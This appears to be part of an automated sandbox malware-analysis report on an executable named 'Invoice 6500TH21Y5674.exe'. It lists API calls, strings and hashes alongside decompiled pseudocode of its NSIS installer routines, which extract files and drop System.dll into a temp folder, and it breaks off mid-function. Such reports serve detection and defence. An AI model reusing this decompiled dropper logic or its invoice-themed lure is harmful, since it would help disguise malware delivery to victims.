                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-3064614985
                                                • Opcode ID: 01fb9e0cb0f04803ffd17b8b81141bc26167464e8ccb864bcb1501931c73c8a8
                                                • Instruction ID: ff286dc4e0ddd5c67b21a0dc49aadedac0e09a5b28e8edd6ac2018649726c89b
                                                • Opcode Fuzzy Hash: 01fb9e0cb0f04803ffd17b8b81141bc26167464e8ccb864bcb1501931c73c8a8
                                                • Instruction Fuzzy Hash: 9C51B071900A04AADF21AB65CC86BBF7B68DF46724F14823BF441B51D2C73C4A82DF69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406448(CHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileA(_a4, 0x7a0db8); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x7a0db8;
                                                			}





                                                APIs
                                                • FindFirstFileA.KERNELBASE(73BCFA90,007A0DB8,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,00405B9D,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,C:\Users\user\AppData\Local\Temp\nsb112C.tmp,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,73BCFA90,C:\Users\user\AppData\Local\Temp\), ref: 00406453
                                                • FindClose.KERNEL32(00000000), ref: 0040645F
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\nsb112C.tmp, xrefs: 00406448
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsb112C.tmp
                                                • API String ID: 2295610775-995190758
                                                • Opcode ID: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
                                                • Instruction ID: 7d3207d9493d68405b9bf293567bde81a359e03289c7d5d361232287f2b34f21
                                                • Opcode Fuzzy Hash: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
                                                • Instruction Fuzzy Hash: B7D01235504620ABC3405B78AD0C88B7A589F563313218F36F46AF12E0C6748C638ADD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E004038E7(void* __eflags) {
                                                				intOrPtr _v4;
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void _v16;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr* _t17;
                                                				void* _t25;
                                                				void* _t27;
                                                				int _t28;
                                                				void* _t31;
                                                				int _t34;
                                                				int _t35;
                                                				int _t39;
                                                				char _t57;
                                                				CHAR* _t59;
                                                				signed char _t63;
                                                				CHAR* _t74;
                                                				intOrPtr _t76;
                                                				CHAR* _t81;
                                                
                                                				_t76 =  *0x7a2f74;
                                                				_t17 = E004064DD(2);
                                                				_t84 = _t17;
                                                				if(_t17 == 0) {
                                                					_t74 = 0x79f568;
                                                					"1033" = 0x30;
                                                					 *0x7aa001 = 0x78;
                                                					 *0x7aa002 = 0;
                                                					E00405FBB(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f568, 0);
                                                					__eflags =  *0x79f568;
                                                					if(__eflags == 0) {
                                                						E00405FBB(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x79f568, 0);
                                                					}
                                                					lstrcatA("1033", _t74);
                                                				} else {
                                                					E00406032("1033",  *_t17() & 0x0000ffff);
                                                				}
                                                				E00403BAC(_t71, _t84);
                                                				_t80 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                                                				 *0x7a3000 =  *0x7a2f7c & 0x00000020;
                                                				 *0x7a301c = 0x10000;
                                                				if(E00405B5A(_t84, "C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                                                					L16:
                                                					if(E00405B5A(_t92, _t80) == 0) {
                                                						E00406167(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
                                                					}
                                                					_t25 = LoadImageA( *0x7a2f60, 0x67, 1, 0, 0, 0x8040);
                                                					 *0x7a2748 = _t25;
                                                					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                                						L21:
                                                						if(E0040140B(0) == 0) {
                                                							_t27 = E00403BAC(_t71, __eflags);
                                                							__eflags =  *0x7a3020;
                                                							if( *0x7a3020 != 0) {
                                                								_t28 = E004052CD(_t27, 0);
                                                								__eflags = _t28;
                                                								if(_t28 == 0) {
                                                									E0040140B(1);
                                                									goto L33;
                                                								}
                                                								__eflags =  *0x7a272c;
                                                								if( *0x7a272c == 0) {
                                                									E0040140B(2);
                                                								}
                                                								goto L22;
                                                							}
                                                							ShowWindow( *0x79f548, 5); // executed
                                                							_t34 = E0040646F("RichEd20"); // executed
                                                							__eflags = _t34;
                                                							if(_t34 == 0) {
                                                								E0040646F("RichEd32");
                                                							}
                                                							_t81 = "RichEdit20A";
                                                							_t35 = GetClassInfoA(0, _t81, 0x7a2700);
                                                							__eflags = _t35;
                                                							if(_t35 == 0) {
                                                								GetClassInfoA(0, "RichEdit", 0x7a2700);
                                                								 *0x7a2724 = _t81;
                                                								RegisterClassA(0x7a2700);
                                                							}
                                                							_t39 = DialogBoxParamA( *0x7a2f60,  *0x7a2740 + 0x00000069 & 0x0000ffff, 0, E00403C84, 0); // executed
                                                							E00403837(E0040140B(5), 1);
                                                							return _t39;
                                                						}
                                                						L22:
                                                						_t31 = 2;
                                                						return _t31;
                                                					} else {
                                                						_t71 =  *0x7a2f60;
                                                						 *0x7a2704 = E00401000;
                                                						 *0x7a2710 =  *0x7a2f60;
                                                						 *0x7a2714 = _t25;
                                                						 *0x7a2724 = 0x40a1f4;
                                                						if(RegisterClassA(0x7a2700) == 0) {
                                                							L33:
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                                						 *0x79f548 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f60, 0);
                                                						goto L21;
                                                					}
                                                				} else {
                                                					_t71 =  *(_t76 + 0x48);
                                                					_t86 = _t71;
                                                					if(_t71 == 0) {
                                                						goto L16;
                                                					}
                                                					_t74 = 0x7a1f00;
                                                					E00405FBB(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x7a2fb8, 0x7a1f00, 0);
                                                					_t57 =  *0x7a1f00; // 0x43
                                                					if(_t57 == 0) {
                                                						goto L16;
                                                					}
                                                					if(_t57 == 0x22) {
                                                						_t74 = 0x7a1f01;
                                                						 *((char*)(E00405A97(0x7a1f01, 0x22))) = 0;
                                                					}
                                                					_t59 = lstrlenA(_t74) + _t74 - 4;
                                                					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
                                                						L15:
                                                						E004060D4(_t80, E00405A6C(_t74));
                                                						goto L16;
                                                					} else {
                                                						_t63 = GetFileAttributesA(_t74);
                                                						if(_t63 == 0xffffffff) {
                                                							L14:
                                                							E00405AB3(_t74);
                                                							goto L15;
                                                						}
                                                						_t92 = _t63 & 0x00000010;
                                                						if((_t63 & 0x00000010) != 0) {
                                                							goto L15;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                			}
























                                                0x00000000
                                                0x00000000
                                                0x00403a02
                                                0x004039e2

                                                APIs
                                                  • Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                  • Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                • lstrcatA.KERNEL32(1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,73BCFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" ,00000000), ref: 00403962
                                                • lstrlenA.KERNEL32(007A1F00,?,?,?,007A1F00,00000000,C:\Users\user\AppData\Local\Temp,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,73BCFA90), ref: 004039D7
                                                • lstrcmpiA.KERNEL32(?,.exe,007A1F00,?,?,?,007A1F00,00000000,C:\Users\user\AppData\Local\Temp,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000), ref: 004039EA
                                                • GetFileAttributesA.KERNEL32(007A1F00), ref: 004039F5
                                                • LoadImageA.USER32 ref: 00403A3E
                                                  • Part of subcall function 00406032: wsprintfA.USER32 ref: 0040603F
                                                • RegisterClassA.USER32 ref: 00403A7B
                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A93
                                                • CreateWindowExA.USER32 ref: 00403AC8
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403AFE
                                                • GetClassInfoA.USER32 ref: 00403B2A
                                                • GetClassInfoA.USER32 ref: 00403B37
                                                • RegisterClassA.USER32 ref: 00403B40
                                                • DialogBoxParamA.USER32 ref: 00403B5F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                • API String ID: 1975747703-479183508
                                                • Opcode ID: 324f55f2a5ac8f7c305ccad0dc84d9ef32b78b46d1c0d1fac3a0d30b78cf5155
                                                • Instruction ID: f7990f1d18b0f5a23d57c8cfe7c70d4d4c73fa70df7bf6ac8ad2bf3217d0cd4d
                                                • Opcode Fuzzy Hash: 324f55f2a5ac8f7c305ccad0dc84d9ef32b78b46d1c0d1fac3a0d30b78cf5155
                                                • Instruction Fuzzy Hash: 29619570640640AEE610AF659D45F3B3E6CEB8574AF10413EF981B62E3DB7D9D028B2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E00402EA1(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				long _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t43;
                                                				long _t50;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				long _t70;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				void* _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				long _t90;
                                                				long _t93;
                                                				intOrPtr* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				_t43 = GetTickCount();
                                                				_t91 = "C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe";
                                                				 *0x7a2f70 = _t43 + 0x3e8;
                                                				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\Invoice 6500TH21Y5674.exe", 0x400);
                                                				_t89 = E00405C6D(_t91, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x40a018 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return "Error launching installer";
                                                				}
                                                				_t92 = "C:\\Users\\jones\\Desktop";
                                                				E004060D4("C:\\Users\\jones\\Desktop", _t91);
                                                				E004060D4(0x7ab000, E00405AB3(_t92));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				 *0x79e124 = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00402E3D(1);
                                                					if( *0x7a2f78 == _t82) {
                                                						goto L29;
                                                					}
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t94 = GlobalAlloc(0x40, _v24);
                                                						E004032DD( *0x7a2f78 + 0x1c);
                                                						_push(_v24);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff); // executed
                                                						_t57 = E004030D8(); // executed
                                                						if(_t57 == _v24) {
                                                							 *0x7a2f74 = _t94;
                                                							 *0x7a2f7c =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x7a2f80 =  *0x7a2f80 + 1;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E00405C28(0x7a2fa0, _t94 + 4, 0x40);
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E004032DD( *0x792118);
                                                					if(E004032C7( &_a4, 4) == 0 || _v12 != _a4) {
                                                						goto L29;
                                                					} else {
                                                						goto L28;
                                                					}
                                                				} else {
                                                					do {
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~( *0x7a2f78) & 0x00007e00) + 0x200;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						if(E004032C7(0x78a118, _t90) == 0) {
                                                							E00402E3D(1);
                                                							L29:
                                                							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						if( *0x7a2f78 != 0) {
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00402E3D(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E00405C28( &_v44, 0x78a118, 0x1c);
                                                						_t77 = _v44;
                                                						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                							_a4 = _a4 | _t77;
                                                							_t87 =  *0x792118; // 0x8c00
                                                							 *0x7a3020 =  *0x7a3020 | _a4 & 0x00000002;
                                                							_t80 = _v20;
                                                							 *0x7a2f78 = _t87;
                                                							if(_t80 > _t93) {
                                                								goto L29;
                                                							}
                                                							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                								_v8 = _v8 + 1;
                                                								_t24 = _t80 - 4; // 0x40a194
                                                								_t93 = _t24;
                                                								if(_t90 > _t93) {
                                                									_t90 = _t93;
                                                								}
                                                								goto L20;
                                                							} else {
                                                								break;
                                                							}
                                                						}
                                                						L20:
                                                						if(_t93 <  *0x79e124) {
                                                							_v12 = E00406594(_v12, 0x78a118, _t90);
                                                						}
                                                						 *0x792118 =  *0x792118 + _t90;
                                                						_t93 = _t93 - _t90;
                                                					} while (_t93 != 0);
                                                					_t82 = 0;
                                                					goto L24;
                                                				}
                                                			}


                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402EB2
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,00000400), ref: 00402ECE
                                                  • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405C71
                                                  • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                • GetFileSize.KERNEL32(00000000,00000000,007AB000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00402F1A
                                                • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                Strings
                                                • Inst, xrefs: 00402F86
                                                • C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
                                                • soft, xrefs: 00402F8F
                                                • C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
                                                • Error launching installer, xrefs: 00402EF1
                                                • Null, xrefs: 00402F98
                                                • "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" , xrefs: 00402EA1
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403077
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                • API String ID: 2803837635-1431146922
                                                • Opcode ID: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
                                                • Instruction ID: e6d4fb369877e8ee952de7074d12315c12307524423d8dbd5c49f4dc18488fa3
                                                • Opcode Fuzzy Hash: 757e6f753a61218cc68c4c3168c4f0314001b502d62b2c7f1e7b3a9d0f58f82d
                                                • Instruction Fuzzy Hash: 3151D271901208AFDF20AF65DD85B6E7AB8EB04755F10813BF500B22D6D77C9E818B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				int _v12;
                                                				intOrPtr _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				char _v88;
                                                				void* _t65;
                                                				void* _t69;
                                                				long _t70;
                                                				intOrPtr _t74;
                                                				long _t75;
                                                				intOrPtr _t76;
                                                				void* _t77;
                                                				int _t87;
                                                				intOrPtr _t91;
                                                				intOrPtr _t94;
                                                				long _t95;
                                                				signed int _t96;
                                                				int _t97;
                                                				int _t98;
                                                				intOrPtr _t99;
                                                				void* _t100;
                                                				void* _t101;
                                                
                                                				_t96 = _a16;
                                                				_t91 = _a12;
                                                				_v12 = _t96;
                                                				if(_t91 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_v16 = _t91;
                                                				if(_t91 == 0) {
                                                					_v16 = 0x796120;
                                                				}
                                                				_t62 = _a4;
                                                				if(_a4 >= 0) {
                                                					E004032DD( *0x7a2fd8 + _t62);
                                                				}
                                                				if(E004032C7( &_a16, 4) == 0) {
                                                					L41:
                                                					_push(0xfffffffd);
                                                					goto L42;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t91 != 0) {
                                                							if(_a16 < _t96) {
                                                								_t96 = _a16;
                                                							}
                                                							if(E004032C7(_t91, _t96) != 0) {
                                                								_v8 = _t96;
                                                								L44:
                                                								return _v8;
                                                							} else {
                                                								goto L41;
                                                							}
                                                						}
                                                						if(_a16 <= _t91) {
                                                							goto L44;
                                                						}
                                                						_t87 = _v12;
                                                						while(1) {
                                                							_t97 = _a16;
                                                							if(_a16 >= _t87) {
                                                								_t97 = _t87;
                                                							}
                                                							if(E004032C7(0x792120, _t97) == 0) {
                                                								goto L41;
                                                							}
                                                							_t69 = E00405D14(_a8, 0x792120, _t97); // executed
                                                							if(_t69 == 0) {
                                                								L28:
                                                								_push(0xfffffffe);
                                                								L42:
                                                								_pop(_t65);
                                                								return _t65;
                                                							}
                                                							_v8 = _v8 + _t97;
                                                							_a16 = _a16 - _t97;
                                                							if(_a16 > 0) {
                                                								continue;
                                                							}
                                                							goto L44;
                                                						}
                                                						goto L41;
                                                					}
                                                					_t70 = GetTickCount();
                                                					 *0x40b878 =  *0x40b878 & 0x00000000;
                                                					_t14 =  &_a16;
                                                					 *_t14 = _a16 & 0x7fffffff;
                                                					_v20 = _t70;
                                                					 *0x40b860 = 0xb;
                                                					_a4 = _a16;
                                                					if( *_t14 <= 0) {
                                                						goto L44;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t98 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t98 = _a16;
                                                						}
                                                						if(E004032C7(0x792120, _t98) == 0) {
                                                							goto L41;
                                                						}
                                                						_a16 = _a16 - _t98;
                                                						 *0x40b850 = 0x792120;
                                                						 *0x40b854 = _t98;
                                                						while(1) {
                                                							_t94 = _v16;
                                                							 *0x40b858 = _t94;
                                                							 *0x40b85c = _v12;
                                                							_t74 = E00406602(0x40b850);
                                                							_v24 = _t74;
                                                							if(_t74 < 0) {
                                                								break;
                                                							}
                                                							_t99 =  *0x40b858; // 0x798f20
                                                							_t100 = _t99 - _t94;
                                                							_t75 = GetTickCount();
                                                							_t95 = _t75;
                                                							if(( *0x7a3034 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
                                                								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t101 = _t101 + 0xc;
                                                								E004051FB(0,  &_v88);
                                                								_v20 = _t95;
                                                							}
                                                							if(_t100 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L44;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_t76 =  *0x40b858; // 0x798f20
                                                									_v8 = _v8 + _t100;
                                                									_v12 = _v12 - _t100;
                                                									_v16 = _t76;
                                                									L23:
                                                									if(_v24 != 4) {
                                                										continue;
                                                									}
                                                									goto L44;
                                                								}
                                                								_t77 = E00405D14(_a8, _v16, _t100); // executed
                                                								if(_t77 == 0) {
                                                									goto L28;
                                                								}
                                                								_v8 = _v8 + _t100;
                                                								goto L23;
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L42;
                                                					}
                                                					goto L41;
                                                				}
                                                			}



























                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: !y$ !y$ ay$... %d%%
                                                • API String ID: 551687249-830929277
                                                • Opcode ID: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
                                                • Instruction ID: a0ed304c84634e1a182b4cedd43d653909124c4238878ead4aa9bd0ee2fb7366
                                                • Opcode Fuzzy Hash: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
                                                • Instruction Fuzzy Hash: CE516E31800219ABCB10DFA5DA44A9F7BB8EF44756F1481BFE800B72D0C7389F448BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E00401759(FILETIME* __ebx, void* __eflags) {
                                                				void* _t33;
                                                				void* _t41;
                                                				void* _t43;
                                                				FILETIME* _t49;
                                                				FILETIME* _t62;
                                                				void* _t64;
                                                				signed int _t70;
                                                				FILETIME* _t71;
                                                				FILETIME* _t75;
                                                				signed int _t77;
                                                				void* _t80;
                                                				CHAR* _t82;
                                                				CHAR* _t83;
                                                				void* _t85;
                                                
                                                				_t75 = __ebx;
                                                				_t82 = E00402BCE(0x31);
                                                				 *(_t85 - 8) = _t82;
                                                				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                				_t33 = E00405AD9(_t82);
                                                				_push(_t82);
                                                				_t83 = "Call";
                                                				if(_t33 == 0) {
                                                					lstrcatA(E00405A6C(E004060D4(_t83, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                				} else {
                                                					E004060D4();
                                                				}
                                                				E004063AF(_t83);
                                                				while(1) {
                                                					__eflags =  *(_t85 + 8) - 3;
                                                					if( *(_t85 + 8) >= 3) {
                                                						_t64 = E00406448(_t83);
                                                						_t77 = 0;
                                                						__eflags = _t64 - _t75;
                                                						if(_t64 != _t75) {
                                                							_t71 = _t64 + 0x14;
                                                							__eflags = _t71;
                                                							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                						__eflags = _t70;
                                                						 *(_t85 + 8) = _t70;
                                                					}
                                                					__eflags =  *(_t85 + 8) - _t75;
                                                					if( *(_t85 + 8) == _t75) {
                                                						E00405C48(_t83);
                                                					}
                                                					__eflags =  *(_t85 + 8) - 1;
                                                					_t41 = E00405C6D(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                					__eflags = _t41 - 0xffffffff;
                                                					 *(_t85 - 0xc) = _t41;
                                                					if(_t41 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t85 + 8) - _t75;
                                                					if( *(_t85 + 8) != _t75) {
                                                						E004051FB(0xffffffe2,  *(_t85 - 8));
                                                						__eflags =  *(_t85 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t85 - 4));
                                                						__eflags =  *0x7a3008;
                                                						goto L32;
                                                					} else {
                                                						E004060D4(0x40ac08, 0x7a4000);
                                                						E004060D4(0x7a4000, _t83);
                                                						E00406167(_t75, 0x40ac08, _t83, "C:\Users\jones\AppData\Local\Temp\nsb112C.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                						E004060D4(0x7a4000, 0x40ac08);
                                                						_t62 = E004057F0("C:\Users\jones\AppData\Local\Temp\nsb112C.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                						__eflags = _t62;
                                                						if(_t62 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t62 == 1;
                                                							if(_t62 == 1) {
                                                								 *0x7a3008 =  &( *0x7a3008->dwLowDateTime);
                                                								L32:
                                                								_t49 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t83);
                                                								_push(0xfffffffa);
                                                								E004051FB();
                                                								L29:
                                                								_t49 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t49;
                                                				}
                                                				E004051FB(0xffffffea,  *(_t85 - 8));
                                                				 *0x7a3034 =  *0x7a3034 + 1;
                                                				_t43 = E004030D8( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                				 *0x7a3034 =  *0x7a3034 - 1;
                                                				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                				_t80 = _t43;
                                                				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
